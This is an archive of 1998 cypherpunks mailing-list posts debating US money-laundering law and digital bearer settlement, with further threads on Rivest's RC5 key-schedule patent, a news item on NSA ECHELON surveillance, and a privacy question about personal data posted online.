(Fraud accounts for about 5% of credit card costs.  Customer service
accounts for about 15%).

> There is a certain logic in the notion of having a legislative
> process and laws.  Our laws in the U.S. weren't written by
> angels up in heaven, but they are better than some other places.

In the case of money laundering regulation I should say almost _no_ other
places.

> If DBS participants advocate that money laundering laws are
> not to be followed, I'm sorry but YOU GUYS have the burden
> of logically arguing your position.  So shut up and quit
> raggin' on *me* about it.

I would just like to see them applied with rationality.  It's fairly clear
that that's too much to ask of the United States.  Interestingly enough
it's typically multi-party systems of government that have a balanced
approach to money laundering.  Perhaps this is because grandstanding with
things like "the war on drugs" isn't as effective outside of a two party
system.  Sheds new light on your comment about democracies and banking
regulations.

Some jurisdictions get along quite well without the nonsense perpetrated in
the United States.  Like Switzerland.  Switzerland has one of the nicest
things in a cash economy I have seen.  A freely circulated 1000CHF note.
It's worth about $750.  (The United States phased out $500 bills long ago
to deal with laundering).  In Switzerland you can drop a 1000CHF note at a
restaurant and no one bats an eye.  In the U.S. you cant take a cab home
from the International Terminal unless you have something smaller than a
$50.  Somehow Switzerland has manage to survive without looting in the
streets and rampant crime.  Luxembourg is in a similar situation.

I tried to purchase a car some years ago outside of D.C. with cash.
Completely legitimate transaction.  No interest nonsense for me to worry
about.  No waiting for the car while the check clears.  Simple.  Right?
The dealership called the police, convinced they were striking a blow
against drug dealers.

It's really gone too far.

> 2.  Practicality.   Without at least a fig leaf of cooperation
> with banking authorities and other police, DBS will not be
> permitted.  Transactions denominated in DBS won't be enforceable
> in courts, and fraud won't be a crime.  Reporting fraud in DBS
> deal would be like reporting a fraud in purchase of heroin.

Practicality?

Of course any student of political science will understand that where
government enforcement of contracts fails or falls short, organized crime
tends to move in.  Reporting fraud in the purchase of heroin to the right
enforcement cartel tends to be much more effective in rendering results
than U.S. courts I'd wager.  Clearly, the United States would not benefit
by forcing DBS underground.  Several jurisdictions will permit DBS and
enforce it.  (I'm involved in the legislative process for one such law in a
European jurisdiction now).  If you believe that DBS should be outlawed
then you must agree that cash should be outlawed.  There is effectively no
difference but velocity.

> The principal reason for failure of electronic money, other
> than cards used in physical establishments, is you can't trust
> the seller to send you the goods.  That's why everybody is
> using credit cards, and bearing the 2-3% charge for "insurance".
>
> You guys seem to think untraceable DBS will be accepted, if
> only a good enough encryption algorithm can be found????

1% of the GNP.  Instant 1% growth for changing a system of clearing.  Think
about that for awhile.

> I think your ideas have a fatal, logical weakness.  Without
> any practical means to verify who got your money, or even
> a legal *right* to enforce a contract, what good is dbs?
> It's not even money.  It's more like a coupon or something.

What you are missing is that all your arguments apply equally to cash.  Why
is cash used if this is so?  Prove to me that you just gave me six $100
bills.  You are, "without any practical means to verify who got your money
or even a legal *right* to enforce a contract" if the transaction is larger
than $500.

If only we could be rid of this pesky cash would could eliminate organized
crime forever.

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 14 Nov 1998 14:34:24 +0800
To: cypherpunks@cyberpass.net
Subject: DBS, Privacy, Money Laundering nonsense.
Message-ID: <v04020a08b272c6e9f408@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: "Black Unicorn" <unicorn@schloss.li>
To: <tboyle@rosehill.net>, "dbs" <dbs@philodox.com>
Subject: DBS, Privacy, Money Laundering nonsense.
Date: Fri, 13 Nov 1998 22:57:51 -0600
Keywords: dbs
MIME-Version: 1.0
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4
Sender: <dbs@philodox.com>
Precedence: Bulk
List-Subscribe: <mailto:requests@philodox.com?subject=subscribe%20dbs>
X-Web-Archive: http://www.philodox.com/dbs-archive/

tboyle@rosehill.net comments:

[...]

> But I simply cannot comprehend the breadth of the agreement
> on this dbs conference, and depth of conviction, that DBS money
> should be designed with the **deliberate objective** of being
> untraceable, for purposes of law enforcement or taxation.

In the case of some DBS advocates you are overstating the matter.  In the
case of others, vastly understating it.

> I have a lot of respect for you guys' intellect but I think
> you're wrong on two fundamental points:
>
> 1.  Rule of law.  Money laundering is a critical piece in
> organized crime. The democratic countries have banking laws.
> Do you think these laws should be followed, or NOT?  (Scurrying
> of feet as all the DBS readers avoid answering.)

Well let's examine this.  The view that all democratic countries have
banking laws really begs the question.  "What are the differences between
said laws."  I can tell you with solid authority, they are many.

I've often repeated this story here and elsewhere.  It's all a matter of
public record.

Set the way-back-machine to just after Reagan has entered office.  Ole Ron
began to crack down on tax evasion and in particular offshore havens.
Taxes would be cut, it was reasoned, but only if loopholes were filled and
evaders rooted out.  (Those of us old enough to remember might even recall
nodding at the sense of it).

This policy was particular hard on certain Caribbean nations.  This was the
time of operation Tradewinds (search for it in the congressional record)
and other IRS black projects where the IRS actually violated local law to
spy on foreign banks even going so far as to drug guards, steal the
briefcases of banking executives, perform unwarranted searches, bribe
foreign officials and all manner of nonsense to root out tax evaders which
might also be U.S. citizens.  For a long while there was a project which
opened and Xeroxed all the incoming mail at JFK which appeared to originate
from offshore havens.  This wasn't in the 50's mind you, but the 80s.  It
was acts like these which prompted the Swiss to strengthen their banking
secrecy during the Second World War.  Just another day in the park in the
U.S.  Just recently this year Mexico nearly indicted several U.S. law
officials for breaking Mexican law during the investigation of several
Mexican banks.  Clearly the practice hasn't abated much in the last 15
years..   (Note also that today all these methods (except for drugging
guards maybe) have their legal equivalents in the United States, which is
in itself a powerful statement).  This continued for some time back when
Ron was at the helm until the United States finally began to threaten to
revoke the U.S. charters of certain banks it considered uncooperative.  At
this point a visitor, unannounced, flew into D.C. and literally dropped by
the White House with no press coverage or fanfare at all in the late
evening.  That visitor was Margaret Thatcher and she proceeded to explain
to Ron over the course of a few hours that if he kept it up many of the
British Protectorates would literally have their economies crippled.

Literally overnight the matter was dropped and the offshore centers left to
quietly continue their business.

So much for democratic countries with universal ideas about banking law, or
the rule of "law and order" in banking regulation.

This is but one example.

So:

Rule of Law - means little in the global-political scheme of things
Democratic Countries Have Banking Laws - none of which are consistent or
consistently applied

Money Laundering is a Key Piece of Organized Crime -

This begs a definition of Money Laundering.  "Concealing the proceeds of a
criminal act" sounds legitimate, but consider that it has been held to
apply to a store clerk who sold food stamps for cash and deposited the
proceeds in his personal (non-anonymous) checking account:  Indicted in
Federal Court for Money Laundering with a maximum possible term of 35
years.  (This is a prosecutorial tactic to get a guilty plea to the basic
theft charge).  Consider also that third parties often take it on the chin
with the wide definition currently applied.  Case in point: Ma and Pa
travel agency innocently accepts a deposit from notorious attorney of drug
dealer.  Their entire holding account is seized including the deposits of
some 700 other potential travelers.  After 7 years of fighting the seizure,
the money is finally returned, without interest.  (Effectively halfing the
value of the funds).  The business is ruined, its reputation in tatters.
Ma and Pa fight it out in bankruptcy, lose their house, most of their
retirement proceeds, etc.  In the process this case sets the precedent that
any amount of illicit funds ($1) deposited in any size account ($500
million) will render the entire account liable to seizure and permit it to
be held in lieu of forfeiture hearings.  That can go on for 7 years or so.
Money which is "laundered" has its title literally revert to the U.S.
Treasury.  This means third parties who innocently accept these funds are
liable for their return, even if they are passed on in the course of
business.  Beginning to seem silly?  Money laundering is an invented
offense.  It's definition in the United States has grown so broad so as to
be laughable, if not so frightening.  Do not think that these are isolated
incidents.

So, money laundering in its commonly understood sense might be key to
organized crime, but what passes for money laundering in the United States
has little to do with it.

Myth:  Money Laundering laws have a serious impact on organized crime.

This is increasingly nonsense.  The United States spends close to
$22,000.00 to seize $1.00 of illicit funds.  Money Laundering today is
extremely sophisticated and enforcement doesn't catch the drug dealers, it
catches professional money launderers.  Today if you are a drug lord you
drop $30 million in cash with a professional launderer who cuts you a
"clean" check for 85% of that figure or so on the spot and takes the risk
of laundering the funds on his own.

Myth: Money Laundering can be detected accurately and effectively and leads
to drug and organized crime convictions.

Nonsense.  Assume for sake of argument that you could detect 99% of
fraudulent transactions with the measures in place (entirely impossible)
and that your false positive rate was only 1% (also entirely impossible).
SWIFT alone processes $2 trillion per day.  That's on the order of $600
trillion per year, just in SWIFT.  (Add another $1.3 billion for CHIPS and
$989 million for Fedwire daily.  Oh, don't forget the foreign exchange
markets, oh and NYSE, oh and NASDAQ, oh and international letters of
credit, oh and...)  The most sinister estimates of the global criminal
economy (primarily drug money) run around $400 billion per year.  Your
false positives will identify $6 trillion in naughty funds that are
actually pure just in SWIFT.  Your correct hits will identify $396 billion
in naughty funds in all systems worldwide.  In this example you will have
15 times as many false hits as correct hits ignoring the lionshare of world
financial systems.  This is under the very best of circumstances.  It's a
losing game..  It's a game only the mathematically challenged or
politically motivated will play.  In fact, money laundering is a tack on
offense that is brought to bear after an arrest on other charges has been
made.  The number of cases that originate with a money laundering
investigation is vanishingly small.

The payment system today eats up over 1.5% of the GNP primarily because of
nonsense regulations like CTR's and other transaction reporting
requirements which can cost up to $15 per transaction and (as we see above)
have little if any effect on professional money laundering.  Given these
numbers the degree of "fraud" in the world financial system is far better
than in the credit card system, which has pretty much reached equilibrium.
(Fraud accounts for about 5% of credit card costs.  Customer service
accounts for about 15%).

> There is a certain logic in the notion of having a legislative
> process and laws.  Our laws in the U.S. weren't written by
> angels up in heaven, but they are better than some other places.

In the case of money laundering regulation I should say almost _no_ other
places.

> If DBS participants advocate that money laundering laws are
> not to be followed, I'm sorry but YOU GUYS have the burden
> of logically arguing your position.  So shut up and quit
> raggin' on *me* about it.

I would just like to see them applied with rationality.  It's fairly clear
that that's too much to ask of the United States.  Interestingly enough
it's typically multi-party systems of government that have a balanced
approach to money laundering.  Perhaps this is because grandstanding with
things like "the war on drugs" isn't as effective outside of a two party
system.  Sheds new light on your comment about democracies and banking
regulations.

Some jurisdictions get along quite well without the nonsense perpetrated in
the United States.  Like Switzerland.  Switzerland has one of the nicest
things in a cash economy I have seen.  A freely circulated 1000CHF note.
It's worth about $750.  (The United States phased out $500 bills long ago
to deal with laundering).  In Switzerland you can drop a 1000CHF note at a
restaurant and no one bats an eye.  In the U.S. you cant take a cab home
from the International Terminal unless you have something smaller than a
$50.  Somehow Switzerland has manage to survive without looting in the
streets and rampant crime.  Luxembourg is in a similar situation.

I tried to purchase a car some years ago outside of D.C. with cash.
Completely legitimate transaction.  No interest nonsense for me to worry
about.  No waiting for the car while the check clears.  Simple.  Right?
The dealership called the police, convinced they were striking a blow
against drug dealers.

It's really gone too far.

> 2.  Practicality.   Without at least a fig leaf of cooperation
> with banking authorities and other police, DBS will not be
> permitted.  Transactions denominated in DBS won't be enforceable
> in courts, and fraud won't be a crime.  Reporting fraud in DBS
> deal would be like reporting a fraud in purchase of heroin.

Practicality?

Of course any student of political science will understand that where
government enforcement of contracts fails or falls short, organized crime
tends to move in.  Reporting fraud in the purchase of heroin to the right
enforcement cartel tends to be much more effective in rendering results
than U.S. courts I'd wager.  Clearly, the United States would not benefit
by forcing DBS underground.  Several jurisdictions will permit DBS and
enforce it.  (I'm involved in the legislative process for one such law in a
European jurisdiction now).  If you believe that DBS should be outlawed
then you must agree that cash should be outlawed.  There is effectively no
difference but velocity.

> The principal reason for failure of electronic money, other
> than cards used in physical establishments, is you can't trust
> the seller to send you the goods.  That's why everybody is
> using credit cards, and bearing the 2-3% charge for "insurance".
>
> You guys seem to think untraceable DBS will be accepted, if
> only a good enough encryption algorithm can be found????

1% of the GNP.  Instant 1% growth for changing a system of clearing.  Think
about that for awhile.

> I think your ideas have a fatal, logical weakness.  Without
> any practical means to verify who got your money, or even
> a legal *right* to enforce a contract, what good is dbs?
> It's not even money.  It's more like a coupon or something.

What you are missing is that all your arguments apply equally to cash.  Why
is cash used if this is so?  Prove to me that you just gave me six $100
bills.  You are, "without any practical means to verify who got your money
or even a legal *right* to enforce a contract" if the transaction is larger
than $500.

If only we could be rid of this pesky cash would could eliminate organized
crime forever.

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 15 Nov 1998 04:01:31 +0800
To: Petro <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
In-Reply-To: <199811110052.SAA21018@einstein.ssz.com>
Message-ID: <3.0.5.32.19981114005026.007cb920@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:18 PM 11/11/98 -0500, Petro or other people wrote:
>	Sub-contracting can often lead to cost savings. For instance,
>instead of each insurer having their own fire station network, they could
>all share one, and only pay a certain cost-per-subscriber.

Government subcontracting can be yet another excuse for graft and kickbacks
or it can be an opportunity for the private sector to seriously compete 
for government business, or at least an opportunity to compete for graft :-)
Sometimes this can save money for the public, though seldom as much
as letting services be provided by the private sector.

>>> 	Looking different is not illegal.
What's that, white boy?
>>> 	Thinking different is not illegal.
Always has been, anywhere, any time....


>	Listen Fuckwad:
>	(1) there are paved roads from one coast to the other, as well as
>railways.
>	(3) Most of the roads being built with federal funds are for
>"congestion  relief", not roads to new places so troops can move.

Of course they are, and everybody's pretty much known it all along,
but "defense" was the excuse used for having the Feds get into the
road-building business on a much more massive scale than ever before.
Much of it corresponded nicely with "urban renewal", the 60s policy
of making cities more beautiful by replacing black peoples' houses with
freeways.  Once (white) people got used to freeways, they mostly
stopped complaining about expenditures, and started complaining that
they didn't have _their_ freeway yet.

>	The Army. Marines, and National Guard are fully capable of getting
>whereever they need to go with our without the current highway system, if
>they weren't they'd be worthless.

No, but the industrial base that keeps the military functioning
does benefit from the highway system.  

>	(2) There hasn't been a war fought on CONUS since we attacked Mexico.

Excuse me?  Are you talking about some recent attack on Mexico,
or are you referring to the Mexican War of 1846?
Or are you contending that the Confederate States weren't part of the
Contiguous United States, and therefore the Union's ReConquest 
of the South wasn't in CONUS?  Or that the Indian wars in the west
weren't wars, just Police Actions, or that the various ex-Mexican
territories weren't States yet, and thus not CONUS?



				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 14 Nov 1998 14:33:55 +0800
To: "dbs" <dcsb@ai.mit.edu
Subject: Re: DBS, Privacy, Money Laundering nonsense.
In-Reply-To: <000001be0c04$5f604620$0100a8c0@p180.Workgroup>
Message-ID: <v04020a0bb272c92279c7@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

At 11:57 PM -0500 on 11/13/98, Black Unicorn wrote:

> If only we could be rid of this pesky cash would could eliminate organized
> crime forever.

Reminds me of something Vinnie Moscaritolo, my alter ego and Samoan attorney,
once said.

"'If we could just pass a few more laws' we could all be criminals."


Nonetheless, I think that DBS will be much more about economics than privacy
or even law. The contrapositive of Unicorn's excellent rant is that the market
for money "laundering" and financial privacy is a rediculuously small fraction
of the market for economic efficiency.

That digital bearer settlement gives us more or less perfect financial privacy
if done under certain conditions is much more a happy accident than anything
else, just like the cheapest way to do a transaction prior to blind signatures
and hash collisions was with book-entry transactions instead of paper bearer
certificates.

I suppose it *might* turn out that you really *can* do an instantaneously
executing, clearing, and settling on-line realtime book-entry transaction,
for everything from pico- to quadridollars, and it would be cheaper, both
macroeconomically and microeconomically, than a digital bearer one, but I
just don't think it's possible at all.


And, of course, we wouldn't have coach fare to Cleveland without a bunch of
"fanatics" out there, prattling away about slipping the surly bounds of earth,
the joy of flight, and all that... ;-).


Thank god for the "fanatics", I say, but let's make sure we pay attention to
Bill Bradley's adage that it's bad luck to be behind at the end of the game.

Whatever is cheapest while still remaining a functional bearer protocol
wins, in other words.

And, in my book, "functional" means "functionally anonymous". It's just
cheaper that way. Having a plane that actually flies is way cheaper than
one which just goes fast down the runway, or even one which scoots along
nicely off the ground, but only in ground effect.

Cheers,
Bob Hettinga

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNk0f7cUCGwxmWcHhAQErBQgAhaFscqaknL0EMnsiKMWYgoHntw88JE2Z
11K8/oyoG/dX8eus5Wqnh05eVY8JWGQ9Fu3C2uXPZbZCa5wh7tjrmIcWOTDgx8kC
Sz11IJJLdcWrdTPw7a1sf/WwhyG4f7NVlyVGNqMVuGrBjImsC5TtG2yU39DVME08
ZR3bVdn6egcCDpve+E7RQ0LYWDHxitxYV3RIaCG/wj9zp5JrMPTAvIgbT+J62T8s
bYUNJyf7XQnkcT5275VLAzFYy+3KBRuyp9k6uIhBaBGKBNRUw/wBwTB8NoBMPcd8
AT3276SNz1oBA+Z/R0JPRBrRkAfio2o3DFIXoC5NY49ikpBuyOEQHg==
=R0aY
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vin McLellan <vin@shore.net>
Date: Sat, 14 Nov 1998 16:49:13 +0800
To: John Young <jya@pipeline.com>
Subject: RE: Rivest Patent
In-Reply-To: <364CC4AF.E30659DA@acm.org>
Message-ID: <v04003a05b2727f7cc22e@[198.115.179.81]>
MIME-Version: 1.0
Content-Type: text/plain



When the always well-informed John Young reported that the US Patent Office
had issued MIT Prof. Ron Rivest US Patent 5835600 for a "Block encryption
algorithm with data-dependent rotations," Eric Cordian
<emc@wire.insync.net> growled:

> So we can't use the rotate instruction with a data-dependent shift
> count in a block encryption algorithm without a license from Ron?
>
> Foo on that.

Really, Mr. Cordian, you should read a patent before you foo at it. See:
http://jya.com/rivest111098.htm

This particular patent is probably less than it first appears to be.

When a patent is marked as "divisional" of a specific application, it means
it has been broken off and separated from a prior patent application.

In this case, when Rivest sought a patent for RC5, a block cipher which is
notable for the elegant simplicity that has become Ron's trademark style,
the Patent Examiner suggested that he refile the application in two parts:
one on the encryption method, and a second on the key-schedule structure.

The patent on the RC5 encryption method, US5724428 -- which has generally
been referred to as the RC5 patent -- was issued March 3, 1998, with the
same title ("Block encryption algorithm with data-dependent rotations") and
an identical Abstract to this more recent patent, US5835600, which was
issued Nov. 10.  See:
http://www.patents.ibm.com/details?pn=US05724428__&language=en

This latest patent, US5835600, only covers the design of the key schedule
used in RC5 (and RC6). Period.  The data-dependent rotation claims were in
the earlier RC5 patent.

Even Ron's initial RC5 patent, however, referred to data-dependent
rotations only in the context that they are used in RC5. It surely is not
any universal IP claim.

Among the relevant prior work Rivest cited in his original application (and
US5724428) was Wolfram Becker's work for IBM in the 1970s -- patented in
US4157454 -- which seems to rely on data-dependent rotations too. Note that
the Patent Examiners determined that Becker's work did not impinge upon or
otherwise disqualify Rivest's specific RC5 claims.

(I wouldn't hazard a guess as to whether RSA's RC5 patent covers IBM's MARS
algorithm, as some have suggested, just because MARS also uses
data-dependent rotations. Some on this list may be competent to dice the
issues that fine but I am not.)

Mr. Cordian ventured an additional opinion or two:

|>As you may have guessed, I'm not a fan of permitting software to be
|>patented.  Particularly things like RSA for which obvious prior art
|>existed....

Eric Michael Cordian is a Persistant Network Nym which has been around for
quite a while. It recently caught to eye of some crypto mavens on these
lists when Cordian revealed himself as both a pseudonym and a collective
identity.

E.M. Cordian has been the net persona behind which a group of
self-described cryptographic professionals have raised $7,500 in donations
to underwrite the "DES Analytic Crack Project," an <ahem> ambitious effort
"to develop ANSI C code which will break DES in under one day on a $5k
workstation."

See: http://www.cyberspace.org/~enoch/crakfaq.html

Now, it seems to me reasonable, albiet academic, to argue whether or not
software should be patentable.  It is also certainly reasonable to argue
whether or not cryptographic algorithms should be patentable.

On the other hand, it seems to me unreasonable, willfully ill-informed,
and/or  malovelent to declare -- in the face of several judicial rulings
which have firmly ratified the RSA PKC patent -- that  "prior art" exists
which should have invalidated that patent.  Horseshit!

Stanford and Cylink couldn't find it, despite a highly motivated and
well-funded search. They doubtless would have paid you handsomely for your
evidence and definitive testimony, but you missed your chance.

Now you'll -- collectively, Sirs? -- just have to settle for being another
cadre in the crowd that hoots and sneers at Ron Rivest whenever he comes up
with something new which significantly enhances our cryptographic arsenal
(and has the gall to patent it or otherwise claim IP ownership.)

Seems like a demeaning role for a group of professionals which claim to
collectively have "decades of practical experience in successfully
implementing the most complex computer algorithms."

	Suerte,

		_Vin

PS. Regarding the debate about whether RC6 will be freely available, my
understanding (as a consulant to RSA) is that Jim Gillogly has it right.

If RC6 is selected as the American AES, RSA (now a subsidary of Security
Dynamics) will relinquish all patent rights and royalty expectations.  If
RC6 is not selected as the AES -- and given the decades of conflict,
antagonism, and competition between the spooks of the NSA and RSA, RC6 is
surely a remote long shot -- RSA will offer it as a commercial product.

The two RC5 patents appear to cover RC6. The AES evaluation process will
provide an invaluable high-stress testbed for Rivest's innovative use of
data-dependent rotations.  When the AES is chosen by the NSA -- whichever
algorithm is finally chosen -- the cryptographic community will know a lot
more about the security and viability of this particular Rivest design.
Then we can start wondering what Rivest will come up with for Ron's Code
(RC) 7.

-----
      Vin McLellan + The Privacy Guild + <vin@shore.net>
  53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548
                         -- <@><@> --





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jukka E Isosaari <jei@zor.hut.fi>
Date: Sat, 14 Nov 1998 10:52:10 +0800
To: cypherpunks@toad.com
Subject: [ISN] Privacy Group Pushes For Hearings on ECHELON   (fwd)
Message-ID: <Pine.LNX.3.96.981114042626.32346J-100000@zor.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Fri, 13 Nov 1998 06:52:45 -0700 (MST)
From: mea culpa <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] Privacy Group Pushes For Hearings on ECHELON  


Push for hearings on Echelon:
Global spy system needs scrutiny, says rights group
http://www.worldnetdaily.com/bluesky_exnews/19981112_xex_push_hearing.shtml
Stephan Archer

In an effort to create some accountability between the country's citizens
and the National Security Agency's top-secret global surveillance system
known as Echelon, the Free Congress Foundation is urging that
congressional hearings be held concerning the NSA's use of the system. 

Originally, Echelon was designed to spy on the Communist Bloc during the
Cold War. However, since the end of the Cold War, the NSA has used it for
other questionable purposes that include spying on the citizens of U.S. 
allies as well as the citizens of other countries, commercial spying, and
even domestic spying. 

In essence, Echelon works through a series of high-tech spy facilities
located primarily in five countries: the United States, Canada, England,
New Zealand, and Australia. These countries, which are sworn to secrecy
about the project in a secret agreement known as UKUSA, all actively take
part in this encroachment of privacy into the lives of the people of the
world by collecting virtually all fax transmissions, e-mails, and phone
calls. Not even cellular phone calls escape the grasp of the Echelon
system. 

"Obviously, we need to have these capabilities," said Wayne Madsen, who
worked in the National COMSEC Assessment Center at the NSA's Fort Meade,
Maryland, facility back in the 1980s and is currently a senior fellow at
the Electronic Privacy Information Center. 

As an example of our country's need for the system, Madsen said, "No one
can argue about using the system to counter terrorism. Where people will
have a problem is where Echelon is used for political and business
interests." 

The Echelon system gets most of its data by collecting all transmissions
handled by the Intelsat and Inmarsat satellites, which are responsible for
much of the electronic communication that takes place between countries. 
Earth-bound communication is sucked up and absorbed by other spy
satellites that the NSA has launched into space. 

"It's a huge vacuum cleaner," said Madsen. 

Once these spy facilities collect the phone calls, e-mails, and faxes, of
virtually everyone on earth, the Echelon system sorts them through a kind
of filter system known as the Echelon dictionary. This dictionary looks
for "flag" words in all of the transmitted communication. While it lets a
majority of all collected material pass through its filter, it tags those
that may pose a threat and tracks all subsequent communication coming from
the source of the original "flagged" message. 

Concerning Echelon's inherent intrusion on people's privacy, Patrick
Poole, the deputy director for the Center of Technology Policy at the Free
Congress Foundation, said, "While we understand the need for the
intelligence power embodied by Echelon, the indiscriminate use of Echelon
presents major threats to liberty not only to U.S. citizens but to
citizens around the world." 

And this threat is real. The foundation's report states that U.S. leaders
have, in fact, already abused this awesome technology. For example, the
report states the following: "In September 1993, President Clinton asked
the CIA to spy on Japanese auto manufacturers that were designing
zero-emission cars and to forward that information to the Big Three U.S. 
car manufacturers: Ford, General Motors and Chrysler." 

"You can assume that all major U.S. corporations are fed items of interest
(via Echelon) from time to time to give them a leg up on international
competitors," said Madsen. 

Although this may be seen as a strategic corporate weapon for American
businesses, in reality, it's an example of technology that can get out of
hand. For example, former Canadian spy Mike Frost stated in his book,
"Spyworld," that in 1981, there was an "accidental" cell phone intercept
of the American ambassador to Canada that resulted in the U.S. getting
outbid by the Canadians in a grain deal with China. The deal brought in
$2.5 billion for the Canadian Wheat Board. 

With this kind of abuse of Echelon's power, the question as to whether or
not the U.S. government has been using this power for political purposes
can be easily raised. This question is seemingly answered in the
foundation's report. 

"The discovery of domestic surveillance targeted at American civilians for
reasons of 'unpopular' political affiliation -- or for no probable cause
at all -- in violation of the First, Fourth and Fifth Amendments of the
Constitution is regularly impeded by very elaborate and complex legal
arguments and privilege claims by the intelligence agencies and the U.S. 
government," the report says. 

When asked if the system has been used by the U.S. government to spy on
its citizens, Madsen told WorldNetDaily that he was sure it has been. 

"I don't believe that the NSA or the current Administration would hesitate
to use this system on American citizens for their own agendas," he said. 

Outraged by this flagrant abuse of power illustrated by our country's
elected officials, Poole said, "While the U.S. is the prime mover behind
the Echelon system, it's shameful that the European Parliament is the body
holding the constitutional debate in regards to Echelon today." 

A September 1998 report for the European Parliament by the Omega
Foundation said, "Within Europe, all e-mail, telephone, and fax
communications are routinely intercepted by the United States National
Security Agency. 

According to the Omega Foundation report, it is this ability of the NSA
that brings major concern to the European Parliament. In an effort to
bring the issues surrounding Echelon to the forefront of American
politics, the Free Congress Foundation plans to send out a report about
Echelon to all of the 500 policy organizations in the U.S. as well as to
select members of Congress. These select individuals include members from
both the House and Senate intelligence committees as well as House and
Senate Constitution subcommittees. Copies of the report will also be sent
to the congressional leadership of both parties. 

Although the foundation is hoping to get some action out of these members
of Congress, Poole said that support at the grassroots level of our
nation's political structure will be a must if this issue isn't to end up
buried by the intelligence committees. 

"For there to be any account and oversight to the Echelon system, the
American people are going to have to contact their elected representatives
in order to investigate the abuses that we know have occurred in regards
to the Echelon system," Poole said. 

See Free Congress Foundation's report on Echelon at: 
http://www.freecongress.org/ctp/echelon.html


-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Repent Security Incorporated [www.repsec.com]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Burton <talon@who.net>
Date: Sat, 14 Nov 1998 18:09:07 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Privacy and the internet
Message-ID: <199811140949.BAA21751@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone know what I should do if someone was posting sensitive
information on a website?

And what if the webmaster of the domain doesnt respond to the request for
removal of information.

IS there something that say's what is and isn't able to be published
"personal information" on the internet.

If someone can reply I'd appreciate it.

Seeking council.

Jason Burton - Starloop Security
security@starloop.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 14 Nov 1998 22:41:07 +0800
To: scoops <dbs@philodox.com>
Subject: Re: DBS, Privacy, Money Laundering nonsense.
In-Reply-To: <v04020a08b272c6e9f408@[139.167.130.246]>
Message-ID: <v04020a0db2733d497ce9@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:22 AM -0500 on 11/14/98, scoops wrote:


> At 12:43 AM 11/14/98 -0500, Robert Hettinga wrote in Response to Black
> Unicorn:
> >--- begin forwarded text

Oops. Looks like you weren't watching your >'s :-). You're actually
responding to Unicorn, not me. *He* was responding to something Todd Boyle
said (well, probably trolled, given his past behavior :-)) on the DBS list.

A sad story, though...

Cheers,
Bob Hettinga


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 15 Nov 1998 00:00:14 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Privacy and the internet (fwd)
Message-ID: <199811141538.JAA03813@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 14 Nov 1998 04:46:03 -0500
> From: Jason Burton <talon@who.net>
> Subject: Privacy and the internet

> 
> Seeking council.
> 

That's exactly what you should do, get a lawyer.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




